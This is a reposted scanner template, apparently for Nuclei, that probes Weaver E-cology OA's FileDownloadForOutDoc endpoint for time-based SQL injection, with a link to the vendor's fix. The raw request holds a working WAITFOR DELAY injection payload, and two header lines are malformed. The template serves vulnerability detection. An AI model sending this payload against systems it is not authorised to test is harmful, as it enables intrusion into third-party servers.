id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: unknown
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
requests:
raw:
|
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: {{Hostname}}
Accept: */*
gzip, deflate :
zh-CN,zh;q=0.9 :
Connection: close
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
matchers:
type: dsl
dsl:
'duration>=5'
官方修复方案
https://www.weaver.com.cn/cs/securityDownload.asp#
原文始发于微信公众号(Khan安全攻防实验室):泛微 E-cology SQL注入漏洞 POC
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论